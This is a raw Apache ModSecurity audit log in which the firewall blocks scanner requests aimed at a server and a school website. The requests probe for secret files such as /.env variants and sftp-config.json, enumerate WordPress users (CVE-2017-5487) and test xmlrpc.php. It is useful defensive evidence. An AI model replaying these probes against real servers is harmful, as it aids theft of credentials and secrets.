103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --b7b40c6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7b40c6d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488395842488 612 (- - -) Stopwatch2: 1745488395842488 612; combined=247, p1=215, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7b40c6d-Z-- --36c4ba5a-A-- [24/Apr/2025:16:53:16 +0700] aAoKDN5yz20UX9VrdZM6PwAAAFc 103.236.140.4 37528 103.236.140.4 8181 --36c4ba5a-B-- GET /.env.development.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --36c4ba5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36c4ba5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488396520179 799 (- - -) Stopwatch2: 1745488396520179 799; combined=345, p1=305, p2=0, p3=0, p4=0, p5=39, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36c4ba5a-Z-- --2c281e08-A-- [24/Apr/2025:16:53:17 +0700] aAoKDfiVYlyO1xhz7yMZLQAAAM4 103.236.140.4 37530 103.236.140.4 8181 --2c281e08-B-- GET /.env.secret HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --2c281e08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c281e08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488397193929 702 (- - -) Stopwatch2: 1745488397193929 702; combined=259, p1=226, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c281e08-Z-- --a0215d57-A-- [24/Apr/2025:16:53:17 +0700] aAoKDfiVYlyO1xhz7yMZLwAAANE 103.236.140.4 37536 103.236.140.4 8181 --a0215d57-B-- GET /.env.staging.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --a0215d57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0215d57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488397876388 774 (- - -) Stopwatch2: 1745488397876388 774; combined=332, p1=298, p2=0, p3=0, p4=0, p5=34, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0215d57-Z-- --5dc3ec15-A-- [24/Apr/2025:16:53:19 +0700] aAoKD95yz20UX9VrdZM6QQAAAEI 103.236.140.4 37542 103.236.140.4 8181 --5dc3ec15-B-- GET /configuration/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --5dc3ec15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dc3ec15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488399245507 681 (- - -) Stopwatch2: 1745488399245507 681; combined=285, p1=249, p2=0, p3=0, p4=0, p5=36, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dc3ec15-Z-- --8b79af03-A-- [24/Apr/2025:16:53:20 +0700] aAoKEPiVYlyO1xhz7yMZMQAAANI 103.236.140.4 37552 103.236.140.4 8181 --8b79af03-B-- GET /.env.config HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --8b79af03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b79af03-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488400607016 838 (- - -) Stopwatch2: 1745488400607016 838; combined=404, p1=370, p2=0, p3=0, p4=0, p5=34, sr=171, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b79af03-Z-- --b1c2900a-A-- [24/Apr/2025:17:37:30 +0700] aAoUaslQo524fhbIj1zlvQAAABE 103.236.140.4 47912 103.236.140.4 8181 --b1c2900a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b1c2900a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1c2900a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745491050743583 2526 (- - -) Stopwatch2: 1745491050743583 2526; combined=1289, p1=410, p2=848, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1c2900a-Z-- --837c143b-A-- [24/Apr/2025:17:37:38 +0700] aAoUcslQo524fhbIj1zlwAAAAAE 103.236.140.4 47948 103.236.140.4 8181 --837c143b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.86 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --837c143b-C-- demo.sayHello --837c143b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --837c143b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745491058026213 7015 (- - -) Stopwatch2: 1745491058026213 7015; combined=4948, p1=618, p2=4076, p3=38, p4=42, p5=102, sr=77, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --837c143b-Z-- --45003f76-A-- [24/Apr/2025:17:48:31 +0700] aAoW_95yz20UX9VrdZM-NgAAAFE 103.236.140.4 50628 103.236.140.4 8181 --45003f76-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.227.32.66 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.227.32.66 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --45003f76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45003f76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745491711682551 824 (- - -) Stopwatch2: 1745491711682551 824; combined=346, p1=308, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45003f76-Z-- --ab0b8403-A-- [24/Apr/2025:17:57:09 +0700] aAoZBWLuk3f9kLjsdTb5AQAAAIc 103.236.140.4 52676 103.236.140.4 8181 --ab0b8403-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 46.250.232.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 46.250.232.244 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --ab0b8403-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab0b8403-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745492229980302 830 (- - -) Stopwatch2: 1745492229980302 830; combined=317, p1=283, p2=0, p3=0, p4=0, p5=33, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab0b8403-Z-- --49678838-A-- [24/Apr/2025:18:24:42 +0700] aAofeslQo524fhbIj1zocQAAABg 103.236.140.4 59198 103.236.140.4 8181 --49678838-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 Accept-Charset: utf-8 --49678838-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49678838-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745493882785810 808 (- - -) Stopwatch2: 1745493882785810 808; combined=299, p1=261, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49678838-Z-- --a07f2579-A-- [24/Apr/2025:18:57:59 +0700] aAonR8lQo524fhbIj1zqHgAAAAA 103.236.140.4 38802 103.236.140.4 8181 --a07f2579-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.185 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a07f2579-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a07f2579-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745495879675682 3254 (- - -) Stopwatch2: 1745495879675682 3254; combined=1436, p1=498, p2=907, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a07f2579-Z-- --c5e14e00-A-- [24/Apr/2025:18:58:26 +0700] aAonYslQo524fhbIj1zqPAAAABY 103.236.140.4 39116 103.236.140.4 8181 --c5e14e00-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.185 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c5e14e00-C-- demo.sayHello --c5e14e00-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5e14e00-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745495906874384 5758 (- - -) Stopwatch2: 1745495906874384 5758; combined=4288, p1=584, p2=3471, p3=31, p4=35, p5=98, sr=118, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5e14e00-Z-- --7df56e7f-A-- [24/Apr/2025:19:18:14 +0700] aAosBmLuk3f9kLjsdTb_TgAAAIk 103.236.140.4 46632 103.236.140.4 8181 --7df56e7f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --7df56e7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7df56e7f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745497094553952 894 (- - -) Stopwatch2: 1745497094553952 894; combined=405, p1=354, p2=0, p3=0, p4=0, p5=51, sr=153, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7df56e7f-Z-- --904dab34-A-- [24/Apr/2025:19:59:24 +0700] aAo1rGLuk3f9kLjsdTYClwAAAIU 103.236.140.4 35648 103.236.140.4 8181 --904dab34-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --904dab34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --904dab34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745499564521843 2907 (- - -) Stopwatch2: 1745499564521843 2907; combined=1440, p1=489, p2=918, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --904dab34-Z-- --6a8d370e-A-- [24/Apr/2025:19:59:30 +0700] aAo1st5yz20UX9VrdZNGiQAAAEY 103.236.140.4 35680 103.236.140.4 8181 --6a8d370e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.11 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6a8d370e-C-- demo.sayHello --6a8d370e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a8d370e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745499570951074 5530 (- - -) Stopwatch2: 1745499570951074 5530; combined=4502, p1=581, p2=3550, p3=31, p4=36, p5=166, sr=75, sw=138, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a8d370e-Z-- --bc351141-A-- [24/Apr/2025:20:16:19 +0700] aAo5o2Luk3f9kLjsdTYDoQAAAI8 103.236.140.4 39616 103.236.140.4 8181 --bc351141-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-J737A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --bc351141-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc351141-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745500579972684 893 (- - -) Stopwatch2: 1745500579972684 893; combined=366, p1=327, p2=0, p3=0, p4=0, p5=38, sr=130, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc351141-Z-- --c1481d2c-A-- [24/Apr/2025:20:19:45 +0700] aAo6cWLuk3f9kLjsdTYD0AAAAIk 103.236.140.4 40408 103.236.140.4 8181 --c1481d2c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3880.5 Mobile Safari/537.36 Accept-Charset: utf-8 --c1481d2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1481d2c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745500785908804 790 (- - -) Stopwatch2: 1745500785908804 790; combined=356, p1=325, p2=0, p3=0, p4=0, p5=31, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1481d2c-Z-- --21821862-A-- [24/Apr/2025:20:25:00 +0700] aAo7rN5yz20UX9VrdZNHtAAAAFA 103.236.140.4 41660 103.236.140.4 8181 --21821862-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --21821862-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21821862-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745501100121949 2617 (- - -) Stopwatch2: 1745501100121949 2617; combined=1216, p1=425, p2=761, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21821862-Z-- --b9594b70-A-- [24/Apr/2025:20:25:06 +0700] aAo7smLuk3f9kLjsdTYEEwAAAI8 103.236.140.4 41692 103.236.140.4 8181 --b9594b70-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.164 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: 